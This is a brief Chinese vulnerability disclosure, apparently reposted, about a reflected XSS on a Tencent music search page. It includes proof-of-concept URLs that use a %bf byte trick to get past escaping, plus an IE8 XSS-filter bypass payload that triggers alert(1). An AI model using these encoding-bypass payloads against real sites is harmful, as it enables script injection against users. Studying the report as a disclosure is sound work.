腾讯一处反射型XSS - 绕过方式比较奇葩 - 网站安

本来是一处非XSS点，但使用有点奇葩的方式就绕过了。

1. 首先是普通情况下：

 

http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa<script>

 

显然，< 和 > 都被过滤成了 &lt; &gt;

 

2. 看起来这并不是一个XSS点，但是可以像下面这样奇葩的绕过

 

http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa%bf<img src%bf%3d1%bf>

 

也就是说，每个字符前面加上 %bf，就不会被过滤，且输出的时候，%bf又没了。

 

3. 进一步，为了绕过IE8的过滤器。结合 WooYun: IE8 xss filter bypass (xss过滤器绕过) 

 

 

http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=%bf<div/id%bf%3dx%bf>x%bf</div%bf>%bf<xml:namespace prefix%bf%3dt%bf>%bf<import namespace%bf%3dt implementation%bf%3d%23default%23time2%bf>%bf<t:set/attributename%bf%3dinnerHTML targetElement%bf%3dx to%bf%3d%26lt;img%26%2311;src%bf%3dx:x%26%2311;onerror%26%2311;%bf%3dalert%26%23x28;1%26%23x29;%26gt;%bf>

 

xp + ie8

 

 

 

 

修复方案： 不知道服务器端的过滤逻辑。 

 

查看更多关于腾讯一处反射型XSS - 绕过方式比较奇葩 - 网站安的详细内容...